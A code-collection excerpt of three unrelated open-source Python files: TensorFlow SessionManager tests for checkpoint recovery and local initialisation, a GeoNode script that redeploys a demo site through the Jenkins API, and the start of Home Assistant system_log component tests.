with self.assertRaises(errors.DeadlineExceededError):
sm.wait_for_session(master="", max_wait_secs=3)
def testInitWithNoneLocalInitOpError(self):
# Creating a SessionManager with a None local_init_op but
# non-None ready_for_local_init_op raises ValueError
with self.assertRaisesRegexp(ValueError,
"If you pass a ready_for_local_init_op "
"you must also pass a local_init_op "):
session_manager.SessionManager(
ready_for_local_init_op=variables.report_uninitialized_variables(
variables.global_variables()),
local_init_op=None)
  @test_util.run_v1_only("b/120545219")
  def testRecoverSessionWithReadyForLocalInitOp(self):
    # Successful recovery from a checkpoint should also run local_init_op
    # (initializing local w from recovered global v) and report
    # initialized=True.
    # Create a checkpoint.
    checkpoint_dir = os.path.join(self.get_temp_dir(),
                                  "recover_session_ready_for_local_init")
    try:
      gfile.DeleteRecursively(checkpoint_dir)
    except errors.OpError:
      pass  # Ignore
    gfile.MakeDirs(checkpoint_dir)
    with ops.Graph().as_default():
      v = variables.VariableV1(1, name="v")
      sm = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables())
      saver = saver_lib.Saver({"v": v})
      sess, initialized = sm.recover_session(
          "", saver=saver, checkpoint_dir=checkpoint_dir)
      self.assertFalse(initialized)
      sess.run(v.initializer)
      self.assertEquals(1, sess.run(v))
      saver.save(sess,
                 os.path.join(checkpoint_dir, "recover_session_checkpoint"))
    # Create a new Graph and SessionManager and recover.
    with ops.Graph().as_default():
      v = variables.VariableV1(2, name="v")
      w = variables.VariableV1(
          v,
          trainable=False,
          collections=[ops.GraphKeys.LOCAL_VARIABLES],
          name="w")
      with self.cached_session():
        self.assertEqual(False, variables.is_variable_initialized(v).eval())
        self.assertEqual(False, variables.is_variable_initialized(w).eval())
      sm2 = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables(),
          ready_for_local_init_op=variables.report_uninitialized_variables(
              variables.global_variables()),
          local_init_op=w.initializer)
      saver = saver_lib.Saver({"v": v})
      sess, initialized = sm2.recover_session(
          "", saver=saver, checkpoint_dir=checkpoint_dir)
      self.assertTrue(initialized)
      self.assertEqual(
          True,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
      self.assertEqual(
          True,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
      self.assertEquals(1, sess.run(v))
      self.assertEquals(1, sess.run(w))

  @test_util.run_v1_only("b/120545219")
  def testRecoverSessionWithReadyForLocalInitOpFailsToReadyLocal(self):
    # We use ready_for_local_init_op=tf.report_uninitialized_variables(),
    # which causes recover_session to not run local_init_op, and to return
    # initialized=False
    # Create a checkpoint.
    checkpoint_dir = os.path.join(
        self.get_temp_dir(),
        "recover_session_ready_for_local_init_fails_to_ready_local")
    try:
      gfile.DeleteRecursively(checkpoint_dir)
    except errors.OpError:
      pass  # Ignore
    gfile.MakeDirs(checkpoint_dir)
    with ops.Graph().as_default():
      v = variables.VariableV1(1, name="v")
      sm = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables())
      saver = saver_lib.Saver({"v": v})
      sess, initialized = sm.recover_session(
          "", saver=saver, checkpoint_dir=checkpoint_dir)
      self.assertFalse(initialized)
      sess.run(v.initializer)
      self.assertEquals(1, sess.run(v))
      saver.save(sess,
                 os.path.join(checkpoint_dir, "recover_session_checkpoint"))
    # Create a new Graph and SessionManager and recover.
    with ops.Graph().as_default():
      v = variables.VariableV1(2, name="v")
      w = variables.VariableV1(
          v,
          trainable=False,
          collections=[ops.GraphKeys.LOCAL_VARIABLES],
          name="w")
      with self.cached_session():
        self.assertEqual(False, variables.is_variable_initialized(v).eval())
        self.assertEqual(False, variables.is_variable_initialized(w).eval())
      sm2 = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables(),
          ready_for_local_init_op=variables.report_uninitialized_variables(),
          local_init_op=w.initializer)
      saver = saver_lib.Saver({"v": v})
      sess, initialized = sm2.recover_session(
          "", saver=saver, checkpoint_dir=checkpoint_dir)
      self.assertFalse(initialized)
      # v was restored from the checkpoint, but w was never locally
      # initialized because the ready_for_local_init_op check failed.
      self.assertEqual(
          True,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
      self.assertEqual(
          False,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
      self.assertEquals(1, sess.run(v))

  @test_util.run_v1_only("b/120545219")
  def testRecoverSessionNoChkptStillRunsLocalInitOp(self):
    # This test checks for backwards compatibility.
    # In particular, we continue to ensure that recover_session will execute
    # local_init_op exactly once, regardless of whether the session was
    # successfully recovered.
    with ops.Graph().as_default():
      w = variables.VariableV1(
          1,
          trainable=False,
          collections=[ops.GraphKeys.LOCAL_VARIABLES],
          name="w")
      with self.cached_session():
        self.assertEqual(False, variables.is_variable_initialized(w).eval())
      sm2 = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables(),
          ready_for_local_init_op=None,
          local_init_op=w.initializer)
      # Try to recover session from None
      sess, initialized = sm2.recover_session(
          "", saver=None, checkpoint_dir=None)
      # Succeeds because recover_session still run local_init_op
      self.assertFalse(initialized)
      self.assertEqual(
          True,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
      self.assertEquals(1, sess.run(w))

  @test_util.run_v1_only("b/120545219")
  def testRecoverSessionFailsStillRunsLocalInitOp(self):
    # Even when no checkpoint exists (recovery fails), local_init_op must
    # still run: w ends up initialized while global v stays uninitialized.
    # Create a checkpoint.
    checkpoint_dir = os.path.join(
        self.get_temp_dir(),
        "recover_session_ready_for_local_init_fails_stil_run")
    try:
      gfile.DeleteRecursively(checkpoint_dir)
    except errors.OpError:
      pass  # Ignore
    gfile.MakeDirs(checkpoint_dir)
    # Create a new Graph and SessionManager and recover.
    with ops.Graph().as_default():
      v = variables.VariableV1(2, name="v")
      w = variables.VariableV1(
          1,
          trainable=False,
          collections=[ops.GraphKeys.LOCAL_VARIABLES],
          name="w")
      with self.cached_session():
        self.assertEqual(False, variables.is_variable_initialized(v).eval())
        self.assertEqual(False, variables.is_variable_initialized(w).eval())
      sm2 = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables(),
          ready_for_local_init_op=None,
          local_init_op=w.initializer)
      saver = saver_lib.Saver({"v": v})
      sess, initialized = sm2.recover_session(
          "",
          saver=saver,
          checkpoint_dir=checkpoint_dir,
          wait_for_checkpoint=False)
      self.assertFalse(initialized)
      self.assertEqual(
          False,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
      self.assertEqual(
          True,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
      self.assertEquals(1, sess.run(w))
  @test_util.run_v1_only("b/120545219")
  def testWaitForSessionLocalInit(self):
    # Once another session initializes the globals, wait_for_session should
    # see the model as ready-for-local-init, run local_init_op, and return.
    server = server_lib.Server.create_local_server()
    with ops.Graph().as_default() as graph:
      v = variables.VariableV1(1, name="v")
      w = variables.VariableV1(
          v,
          trainable=False,
          collections=[ops.GraphKeys.LOCAL_VARIABLES],
          name="w")
      sm = session_manager.SessionManager(
          graph=graph,
          ready_op=variables.report_uninitialized_variables(),
          ready_for_local_init_op=variables.report_uninitialized_variables(
              variables.global_variables()),
          local_init_op=w.initializer)
      # Initialize v but not w
      s = session_lib.Session(server.target, graph=graph)
      s.run(v.initializer)
      sess = sm.wait_for_session(server.target, max_wait_secs=3)
      self.assertEqual(
          True,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
      self.assertEqual(
          True,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
      self.assertEquals(1, sess.run(v))
      self.assertEquals(1, sess.run(w))

  def testWaitForSessionWithReadyForLocalInitOpFailsToReadyLocal(self):
    # An overly strict ready_for_local_init_op (covering local vars too)
    # never passes, so local_init_op never runs and the wait times out.
    with ops.Graph().as_default() as graph:
      v = variables.VariableV1(1, name="v")
      w = variables.VariableV1(
          v,
          trainable=False,
          collections=[ops.GraphKeys.LOCAL_VARIABLES],
          name="w")
      sm = session_manager.SessionManager(
          graph=graph,
          ready_op=variables.report_uninitialized_variables(),
          ready_for_local_init_op=variables.report_uninitialized_variables(),
          local_init_op=w.initializer)
      with self.assertRaises(errors_impl.DeadlineExceededError):
        # Time-out because w fails to be initialized,
        # because of overly restrictive ready_for_local_init_op
        sm.wait_for_session("", max_wait_secs=3)

  @test_util.run_v1_only("b/120545219")
  def testWaitForSessionInsufficientReadyForLocalInitCheck(self):
    # With no ready_for_local_init_op, local_init_op runs on uninitialized v,
    # so the model never becomes ready and the wait times out.
    with ops.Graph().as_default() as graph:
      v = variables.VariableV1(1, name="v")
      w = variables.VariableV1(
          v,
          trainable=False,
          collections=[ops.GraphKeys.LOCAL_VARIABLES],
          name="w")
      sm = session_manager.SessionManager(
          graph=graph,
          ready_op=variables.report_uninitialized_variables(),
          ready_for_local_init_op=None,
          local_init_op=w.initializer)
      with self.assertRaisesRegexp(errors_impl.DeadlineExceededError,
                                   "Session was not ready after waiting.*"):
        sm.wait_for_session("", max_wait_secs=3)
@test_util.run_v1_only("b/120545219")
def testPrepareSessionWithReadyForLocalInitOp(self):
with ops.Graph().as_default():
v = variables.VariableV1(1, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
x = variables.VariableV1(
3 * v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="x")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
self.assertEqual(False, variables.is_variable_initialized(w).eval())
self.assertEqual(False, variables.is_variable_initialized(x).eval())
sm2 = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables(),
ready_for_local_init_op=variables.report_uninitialized_variables(
variables.global_variables()),
local_init_op=[w.initializer, x.initializer])
sess = sm2.prepare_session("", init_op=v.initializer)
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("x:0")).eval(session=sess))
self.assertEquals(1, sess.run(v))
self.assertEquals(1, sess.run(w))
self.assertEquals(3, sess.run(x))
@test_util.run_v1_only("b/120545219")
def testPrepareSessionWithPartialInitOp(self):
with ops.Graph().as_default():
v = variables.VariableV1(1, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
x = variables.VariableV1(
3 * v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="x")
# TODO(b/70206927): Use ResourceVariables once they are handled properly.
v_res = variables.VariableV1(1, name="v_res")
w_res = variables.VariableV1(
v_res,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w_res")
x_res = variables.VariableV1(
3 * v_res,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="x_res")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
self.assertEqual(False, variables.is_variable_initialized(w).eval())
self.assertEqual(False, variables.is_variable_initialized(x).eval())
self.assertEqual(False, variables.is_variable_initialized(v_res).eval())
self.assertEqual(False, variables.is_variable_initialized(w_res).eval())
self.assertEqual(False, variables.is_variable_initialized(x_res).eval())
sm2 = session_manager.SessionManager(local_init_op=[
w.initializer, x.initializer, w_res.initializer, x_res.initializer
])
sess = sm2.prepare_session("", init_op=None)
self.assertEqual(
False,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("x:0")).eval(session=sess))
self.assertEquals(1, sess.run(w))
self.assertEquals(3, sess.run(x))
self.assertEqual(
False,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v_res:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("w_res:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("x_res:0")).eval(session=sess))
self.assertEquals(1, sess.run(w_res))
self.assertEquals(3, sess.run(x_res))
  @test_util.run_v1_only("b/120545219")
  def testPrepareSessionWithCyclicInitializer(self):
    # Regression test. Previously Variable._build_initializer_expr would enter
    # into an infinite recursion when the variable's initial_value involved
    # cyclic dependencies.
    with ops.Graph().as_default():
      # The while_loop output feeds the variable's initial value, so the
      # initializer expression contains a (control-flow) cycle.
      i = control_flow_ops.while_loop(lambda i: i < 1, lambda i: i + 1, [0])
      v = variables.VariableV1(array_ops.identity(i), name="v")
      with self.cached_session():
        self.assertEqual(False, variables.is_variable_initialized(v).eval())
      sm = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables())
      # prepare_session must terminate (no infinite recursion) and leave v
      # initialized to the loop result.
      sess = sm.prepare_session("", init_op=v.initializer)
      self.assertEqual(1, sess.run(v))
      self.assertEqual(
          True,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
  def testPrepareSessionDidNotInitLocalVariable(self):
    """init_op initializes only v; the local variable w stays uninitialized,
    so the ready_op must make prepare_session raise."""
    with ops.Graph().as_default():
      v = variables.VariableV1(1, name="v")
      # w lives in LOCAL_VARIABLES and is initialized from v's value.
      w = variables.VariableV1(
          v,
          trainable=False,
          collections=[ops.GraphKeys.LOCAL_VARIABLES],
          name="w")
      with self.cached_session():
        self.assertEqual(False, variables.is_variable_initialized(v).eval())
        self.assertEqual(False, variables.is_variable_initialized(w).eval())
      sm2 = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables())
      with self.assertRaisesRegexp(
          RuntimeError, "Init operations did not make model ready.*"):
        sm2.prepare_session("", init_op=v.initializer)

  def testPrepareSessionDidNotInitLocalVariableList(self):
    """Same as above, but init_op is passed as a list of ops."""
    with ops.Graph().as_default():
      v = variables.VariableV1(1, name="v")
      w = variables.VariableV1(
          v,
          trainable=False,
          collections=[ops.GraphKeys.LOCAL_VARIABLES],
          name="w")
      with self.cached_session():
        self.assertEqual(False, variables.is_variable_initialized(v).eval())
        self.assertEqual(False, variables.is_variable_initialized(w).eval())
      sm2 = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables())
      with self.assertRaisesRegexp(RuntimeError,
                                   "Init operations did not make model ready"):
        sm2.prepare_session("", init_op=[v.initializer])
  def testPrepareSessionWithReadyNotReadyForLocal(self):
    """With no init_op, the globals stay uninitialized, so the
    ready_for_local_init_op check must fail before local init runs."""
    with ops.Graph().as_default():
      v = variables.VariableV1(1, name="v")
      w = variables.VariableV1(
          v,
          trainable=False,
          collections=[ops.GraphKeys.LOCAL_VARIABLES],
          name="w")
      with self.cached_session():
        self.assertEqual(False, variables.is_variable_initialized(v).eval())
        self.assertEqual(False, variables.is_variable_initialized(w).eval())
      sm2 = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables(),
          # Only globals gate local init; v is never initialized here.
          ready_for_local_init_op=variables.report_uninitialized_variables(
              variables.global_variables()),
          local_init_op=w.initializer)
      with self.assertRaisesRegexp(
          RuntimeError,
          "Init operations did not make model ready for local_init"):
        sm2.prepare_session("", init_op=None)

  @test_util.run_v1_only("b/120545219")
  def testPrepareSessionWithInsufficientReadyForLocalInitCheck(self):
    """Without a ready_for_local_init_op, local init runs unconditionally;
    the final ready_op then reports the still-uninitialized global v."""
    with ops.Graph().as_default():
      v = variables.VariableV1(1, name="v")
      w = variables.VariableV1(
          v,
          trainable=False,
          collections=[ops.GraphKeys.LOCAL_VARIABLES],
          name="w")
      with self.cached_session():
        self.assertEqual(False, variables.is_variable_initialized(v).eval())
        self.assertEqual(False, variables.is_variable_initialized(w).eval())
      sm2 = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables(),
          ready_for_local_init_op=None,
          local_init_op=w.initializer)
      with self.assertRaisesRegexp(RuntimeError,
                                   "Init operations did not make model ready.*"):
        sm2.prepare_session("", init_op=None)
class ObsoleteSessionManagerTest(test.TestCase):
  """Exercises SessionManager with the deprecated
  `assert_variables_initialized()` ready op, kept for compatibility."""

  def testPrepareSessionSucceeds(self):
    """prepare_session with an init_op yields an initialized model."""
    with ops.Graph().as_default():
      v = variables.VariableV1([1.0, 2.0, 3.0], name="v")
      sm = session_manager.SessionManager(
          ready_op=variables.assert_variables_initialized())
      sess = sm.prepare_session(
          "", init_op=variables.global_variables_initializer())
      self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))

  def testPrepareSessionSucceedsWithInitFeedDict(self):
    """init_feed_dict supplies the placeholder backing v's initial value."""
    with ops.Graph().as_default():
      p = array_ops.placeholder(dtypes.float32, shape=(3,))
      v = variables.VariableV1(p, name="v")
      sm = session_manager.SessionManager(
          ready_op=variables.assert_variables_initialized())
      sess = sm.prepare_session(
          "",
          init_op=variables.global_variables_initializer(),
          init_feed_dict={p: [1.0, 2.0, 3.0]})
      self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))

  def testPrepareSessionSucceedsWithInitFn(self):
    """A callable init_fn may initialize the model instead of an init_op."""
    with ops.Graph().as_default():
      v = variables.VariableV1([125], name="v")
      sm = session_manager.SessionManager(
          ready_op=variables.assert_variables_initialized())
      sess = sm.prepare_session(
          "", init_fn=lambda sess: sess.run(v.initializer))
      self.assertAllClose([125], sess.run(v))

  @test_util.run_v1_only("b/120545219")
  def testPrepareSessionFails(self):
    """Recovery without init_op fails until a checkpoint becomes visible."""
    checkpoint_dir = os.path.join(self.get_temp_dir(), "prepare_session")
    checkpoint_dir2 = os.path.join(self.get_temp_dir(), "prepare_session2")
    try:
      gfile.DeleteRecursively(checkpoint_dir)
      gfile.DeleteRecursively(checkpoint_dir2)
    except errors.OpError:
      pass  # Ignore
    gfile.MakeDirs(checkpoint_dir)

    with ops.Graph().as_default():
      v = variables.VariableV1([1.0, 2.0, 3.0], name="v")
      sm = session_manager.SessionManager(
          ready_op=variables.assert_variables_initialized())
      saver = saver_lib.Saver({"v": v})
      sess = sm.prepare_session(
          "",
          init_op=variables.global_variables_initializer(),
          saver=saver,
          checkpoint_dir=checkpoint_dir)
      self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
      checkpoint_filename = os.path.join(checkpoint_dir,
                                         "prepare_session_checkpoint")
      saver.save(sess, checkpoint_filename)
    # Create a new Graph and SessionManager and recover.
    with ops.Graph().as_default():
      # Renames the checkpoint directory so recovery finds nothing at first.
      os.rename(checkpoint_dir, checkpoint_dir2)
      gfile.MakeDirs(checkpoint_dir)
      v = variables.VariableV1([6.0, 7.0, 8.0], name="v")
      with self.cached_session():
        self.assertEqual(False, variables.is_variable_initialized(v).eval())
      # NOTE(review): this SessionManager is constructed but discarded; the
      # calls below reuse `sm` from the previous graph. Looks unintended --
      # confirm before changing, preserved here to keep behavior identical.
      session_manager.SessionManager(
          ready_op=variables.assert_variables_initialized())
      saver = saver_lib.Saver({"v": v})
      # This should fail as there's no checkpoint within 2 seconds.
      with self.assertRaisesRegexp(
          RuntimeError, "no init_op or init_fn or local_init_op was given"):
        sess = sm.prepare_session(
            "",
            init_op=None,
            saver=saver,
            checkpoint_dir=checkpoint_dir,
            wait_for_checkpoint=True,
            max_wait_secs=2)
      # Rename the checkpoint directory back.
      gfile.DeleteRecursively(checkpoint_dir)
      os.rename(checkpoint_dir2, checkpoint_dir)
      # This should succeed as there's checkpoint.
      sess = sm.prepare_session(
          "",
          init_op=None,
          saver=saver,
          checkpoint_dir=checkpoint_dir,
          wait_for_checkpoint=True,
          max_wait_secs=2)
      self.assertEqual(
          True,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("v:0")).eval(session=sess))

  @test_util.run_v1_only("b/120545219")
  def testRecoverSession(self):
    """recover_session restores variable values from a saved checkpoint."""
    # Create a checkpoint.
    checkpoint_dir = os.path.join(self.get_temp_dir(), "recover_session")
    try:
      gfile.DeleteRecursively(checkpoint_dir)
    except errors.OpError:
      pass  # Ignore
    gfile.MakeDirs(checkpoint_dir)

    with ops.Graph().as_default():
      v = variables.VariableV1(1, name="v")
      sm = session_manager.SessionManager(
          ready_op=variables.assert_variables_initialized())
      saver = saver_lib.Saver({"v": v})
      sess, initialized = sm.recover_session(
          "", saver=saver, checkpoint_dir=checkpoint_dir)
      self.assertFalse(initialized)
      sess.run(v.initializer)
      # Fixed: assertEquals is a deprecated unittest alias of assertEqual.
      self.assertEqual(1, sess.run(v))
      saver.save(sess,
                 os.path.join(checkpoint_dir, "recover_session_checkpoint"))
    # Create a new Graph and SessionManager and recover.
    with ops.Graph().as_default():
      # The default value 2 must be overwritten by the checkpointed 1.
      v = variables.VariableV1(2, name="v")
      with self.cached_session():
        self.assertEqual(False, variables.is_variable_initialized(v).eval())
      sm2 = session_manager.SessionManager(
          ready_op=variables.assert_variables_initialized())
      saver = saver_lib.Saver({"v": v})
      sess, initialized = sm2.recover_session(
          "", saver=saver, checkpoint_dir=checkpoint_dir)
      self.assertTrue(initialized)
      self.assertEqual(
          True,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
      self.assertEqual(1, sess.run(v))

  @test_util.run_v1_only("b/120545219")
  def testWaitForSessionReturnsNoneAfterTimeout(self):
    """wait_for_session raises DeadlineExceededError when nothing becomes
    ready within max_wait_secs."""
    with ops.Graph().as_default():
      variables.VariableV1(1, name="v")
      sm = session_manager.SessionManager(
          ready_op=variables.assert_variables_initialized(),
          recovery_wait_secs=1)
      # Set max_wait_secs to allow us to try a few times.
      with self.assertRaises(errors.DeadlineExceededError):
        sm.wait_for_session(master="", max_wait_secs=3)
if __name__ == "__main__":
  # Standard TensorFlow test entry point.
  test.main()
|
apache-2.0
|
jj0hns0n/geonode
|
scripts/cloud/demo_site.py
|
24
|
3716
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import json
import jenkins
import sys
from optparse import OptionParser
from six.moves.urllib.request import Request
JENKINS_IP = 'http://52.7.139.177/'
GEONODE_DEMO_DOMAIN = 'demo.geonode.org' # should match the jenkins configuration
NODE_LIST = 'computer/api/json' # jenkins api backend
GEONODE_DEMO_JOB = 'geonode-aws' # jenkins job name for demo site
## USAGE
# python demo_site.py -u username -t jenkins_api_token task
# task can be either "redeploy-demo-site", "build-demo-job"
class DemoGeonode(object):
    """
    This class allows interaction with the Jenkins APIs to do several tasks,
    for a more detailed guide on how to use self.j see
    https://python-jenkins.readthedocs.org/en/latest/api.html
    """

    def __init__(self, username, token):
        # `token` is a Jenkins API token, not the account password.
        self.j = jenkins.Jenkins(JENKINS_IP, username, token)

    def redeployDemo(self):
        """Delete the jenkins node on which runs the amazon VM,
        this will both shutdown the VM and create a new one with a fresh
        geonode instance."""
        nodes_data = json.loads(
            self.j.jenkins_open(Request(self.j.server + NODE_LIST)))
        demo_node = self.getDemoNode(nodes_data)
        if demo_node is not None:
            self.deleteNode(demo_node)
            self.buildJob(GEONODE_DEMO_JOB)
            print('re-deploy complete!')
        else:
            # Fixed typo in the message: was 'demo.genode.org'.
            print('No demo.geonode.org node found on jenkins')

    def getDemoNode(self, nodes_data):
        """Commodity method to get the correct jenkins node name,
        the name is composed by 'demo.geonode.org' and the VM id.

        Returns None when no node matches; if several match, the last one
        listed wins (original behaviour preserved).
        """
        demo_node = None
        for node in nodes_data['computer']:
            if GEONODE_DEMO_DOMAIN in node['displayName']:
                demo_node = node['displayName']
        return demo_node

    def deleteNode(self, node_name):
        """Delete the jenkins node and shutdown the amazon VM"""
        print('Deleting demo node')
        self.j.delete_node(node_name)
        print('Deletion requested')

    def buildJob(self, job):
        """Trigger a job build"""
        print('Building %s job' % job)
        self.j.build_job(job)
        print('Build requested')
if __name__ == "__main__":
    # CLI entry point: requires -u/-t credentials plus a trailing task name
    # ("redeploy-demo-site" or "build-demo-job").
    parser = OptionParser()
    parser.add_option("-u", "--username", dest="username",
                      help="jenkins username")
    parser.add_option("-t", "--token", dest="token",
                      help="jenkins access token")
    (options, args) = parser.parse_args()
    if options.username is not None and options.token is not None:
        # The task is read from the last positional argument.
        task = sys.argv[-1]
        demo = DemoGeonode(options.username, options.token)
        if task == 'redeploy-demo-site':
            demo.redeployDemo()
        elif task == 'build-demo-job':
            demo.buildJob(GEONODE_DEMO_JOB)
        else:
            print 'Command not found'
    else:
        print 'username and access token are both required'
|
gpl-3.0
|
tinloaf/home-assistant
|
tests/components/test_system_log.py
|
1
|
9023
|
"""Test system log component."""
import logging
from unittest.mock import MagicMock, patch
from homeassistant.core import callback
from homeassistant.bootstrap import async_setup_component
from homeassistant.components import system_log
_LOGGER = logging.getLogger('test_logger')
BASIC_CONFIG = {
'system_log': {
'max_entries': 2,
}
}
async def get_error_log(hass, hass_client, expected_count):
    """Fetch all entries from system_log via the API.

    Asserts the HTTP status and the number of entries, then returns them.
    """
    client = await hass_client()
    resp = await client.get('/api/error/all')
    # The endpoint must respond even when the log is empty.
    assert resp.status == 200

    data = await resp.json()
    assert len(data) == expected_count
    return data
def _generate_and_log_exception(exception, log):
    """Raise an Exception carrying *exception* text and log it with *log*."""
    try:
        raise Exception(exception)
    except:  # noqa: E722 pylint: disable=bare-except
        # Bare except is deliberate: the helper must record whatever is the
        # active exception via _LOGGER.exception for the tests to inspect.
        _LOGGER.exception(log)
def assert_log(log, exception, message, level):
    """Verify that a single log entry carries the expected field values."""
    assert exception in log['exception']
    assert log['message'] == message
    assert log['level'] == level
    # Every entry must be stamped, regardless of its content.
    assert 'timestamp' in log
def get_frame(name):
    """Build a minimal stack-frame tuple whose only set field is *name*."""
    frame = (name, None, None, None)
    return frame
async def test_normal_logs(hass, hass_client):
    """Test that debug and info are not logged."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    _LOGGER.debug('debug')
    _LOGGER.info('info')

    # Assert done by get_error_log
    await get_error_log(hass, hass_client, 0)


async def test_exception(hass, hass_client):
    """Test that exceptions are logged and retrieved correctly."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    _generate_and_log_exception('exception message', 'log message')
    log = (await get_error_log(hass, hass_client, 1))[0]
    assert_log(log, 'exception message', 'log message', 'ERROR')


async def test_warning(hass, hass_client):
    """Test that warning are logged and retrieved correctly."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    _LOGGER.warning('warning message')
    log = (await get_error_log(hass, hass_client, 1))[0]
    # Plain warnings carry no exception text, hence the empty string.
    assert_log(log, '', 'warning message', 'WARNING')


async def test_error(hass, hass_client):
    """Test that errors are logged and retrieved correctly."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    _LOGGER.error('error message')
    log = (await get_error_log(hass, hass_client, 1))[0]
    assert_log(log, '', 'error message', 'ERROR')
async def test_config_not_fire_event(hass):
    """Test that errors are not posted as events with default config."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    events = []

    @callback
    def event_listener(event):
        """Listen to events of type system_log_event."""
        events.append(event)

    hass.bus.async_listen(system_log.EVENT_SYSTEM_LOG, event_listener)
    _LOGGER.error('error message')
    await hass.async_block_till_done()
    # fire_event defaults to off, so no bus event may be dispatched.
    assert len(events) == 0


async def test_error_posted_as_event(hass):
    """Test that error are posted as events."""
    # Same config as BASIC_CONFIG but with fire_event enabled.
    await async_setup_component(hass, system_log.DOMAIN, {
        'system_log': {
            'max_entries': 2,
            'fire_event': True,
        }
    })
    events = []

    @callback
    def event_listener(event):
        """Listen to events of type system_log_event."""
        events.append(event)

    hass.bus.async_listen(system_log.EVENT_SYSTEM_LOG, event_listener)
    _LOGGER.error('error message')
    await hass.async_block_till_done()
    assert len(events) == 1
    assert_log(events[0].data, '', 'error message', 'ERROR')
async def test_critical(hass, hass_client):
    """Test that critical are logged and retrieved correctly."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    _LOGGER.critical('critical message')
    log = (await get_error_log(hass, hass_client, 1))[0]
    assert_log(log, '', 'critical message', 'CRITICAL')


async def test_remove_older_logs(hass, hass_client):
    """Test that older logs are rotated out."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    _LOGGER.error('error message 1')
    _LOGGER.error('error message 2')
    _LOGGER.error('error message 3')
    # max_entries is 2, so only the newest two survive, newest first.
    log = await get_error_log(hass, hass_client, 2)
    assert_log(log[0], '', 'error message 3', 'ERROR')
    assert_log(log[1], '', 'error message 2', 'ERROR')


async def test_clear_logs(hass, hass_client):
    """Test that the log can be cleared via a service call."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    _LOGGER.error('error message')
    hass.async_add_job(
        hass.services.async_call(
            system_log.DOMAIN, system_log.SERVICE_CLEAR, {}))
    await hass.async_block_till_done()

    # Assert done by get_error_log
    await get_error_log(hass, hass_client, 0)
async def test_write_log(hass):
    """Test that error propagates to logger."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    logger = MagicMock()
    with patch('logging.getLogger', return_value=logger) as mock_logging:
        hass.async_add_job(
            hass.services.async_call(
